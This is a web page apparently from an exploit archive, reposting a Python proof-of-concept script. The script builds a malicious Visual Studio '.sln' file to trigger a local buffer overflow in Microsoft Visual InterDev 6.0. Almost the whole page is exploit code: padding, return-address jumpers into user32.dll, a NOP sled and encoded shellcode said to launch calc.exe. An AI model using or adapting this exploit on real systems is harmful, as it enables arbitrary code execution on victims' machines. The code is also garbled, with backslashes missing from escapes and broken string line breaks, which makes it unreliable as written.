Home / os / win10

mssln-overflow.txt

Posted on 11 January 2008

#usage: exploit.py FileName

import sys

print "------------------------------------------------------------------------"
print ' Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org
"
print " I really have much fun exploiting this one :)"
print " We need to patch five exceptions before we can have EIP:
"
print " #7C80A268   8801             MOV BYTE PTR DS:[ECX],AL"
print " #ECX 42424242      <--       to patch with jumper 0x7E3FBEFF"
print "------------------------------------------------------------------------"

buff      = "A" * 1764

jumper    = "xFFxBEx3Fx7E" #call ESP from user32.dll

buff2     = "A" * 4

buff3     = "A" * 24

buff4     = "A" * 16

buff5     = "A" * 4

nop       = "x90x90x90x90"

shellcode = \n"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+\n"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+\n"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+\n"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+\n"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34"+\n"x42x50x42x30x42x50x4bx38x45x44x4ex43x4bx38x4ex47"+\n"x45x30x4ax47x41x30x4fx4ex4bx48x4fx54x4ax41x4bx38"+\n"x4fx55x42x52x41x30x4bx4ex49x54x4bx48x46x33x4bx48"+\n"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x48x42x4c"+\n"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+\n"x46x4fx4bx43x46x35x46x52x46x30x45x37x45x4ex4bx58"+\n"x4fx45x46x42x41x50x4bx4ex48x46x4bx48x4ex30x4bx44"+\n"x4bx48x4fx35x4ex41x41x30x4bx4ex4bx38x4ex51x4bx38"+\n"x41x50x4bx4ex49x38x4ex45x46x32x46x50x43x4cx41x33"+\n"x42x4cx46x46x4bx48x42x34x42x33x45x38x42x4cx4ax47"+\n"x4ex30x4bx38x42x34x4ex50x4bx58x42x47x4ex41x4dx4a"+\n"x4bx58x4ax36x4ax30x4bx4ex49x50x4bx48x42x48x42x4b"+\n"x42x30x42x50x42x30x4bx38x4ax56x4ex43x4fx55x41x33"+\n"x48x4fx42x46x48x35x49x38x4ax4fx43x58x42x4cx4bx37"+\n"x42x55x4ax36x42x4fx4cx58x46x50x4fx35x4ax36x4ax59"+\n"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x56x41x56"+\n"x4ex46x43x56x50x32x45x46x4ax37x45x36x42x50x5a"

#execute calc.exe

buff6     = "A" * 8

get_EIP   = "xFFxB9x3Fx7E" #call EBP from user32.dll

buff7     = "A" * 56

try:
sln_file = \n'Microsoft Visual Studio Solution File, Format Version 1.00
'+\n'Project("{00000000-0000-0000-0000-000000000000}") = "CAB2", "' + buff + jumper + buff2 + jumper + buff3 + jumper + buff4 + jumper + buff5 + nop + shellcode + nop + '", "' + jumper + buff6 + get_EIP + buff7 + '"
'+\n'EndProject
'+\n'Global
'+\n'	GlobalSection(LocalDeployment) = postSolution
'+\n'		StartupProject = {00000000-0000-0000-0000-000000000000}
'+\n'	EndGlobalSection
'+\n'	GlobalSection(BuildOrder) = postSolution
'+\n'		0 = {00000000-0000-0000-0000-000000000000}
'+\n'	EndGlobalSection
'+\n'	GlobalSection(DeploymentRoot) = postSolution
'+\n'	EndGlobalSection
'+\n'VersionCompanyName="xxx"
'+\n'EndGlobal'

out_file = open(sys.argv[1] + ".sln",'w')
out_file.write(sln_file)
out_file.close()
print "
FILE CREATION COMPLETED!
"
except:
print " 
 -------------------------------------"
print "  Usage: exploit.py FileName"
print " -------------------------------------"
print "
AN ERROR OCCURS DURING FILE CREATION!"

 

TOP

Malware :

Exploits :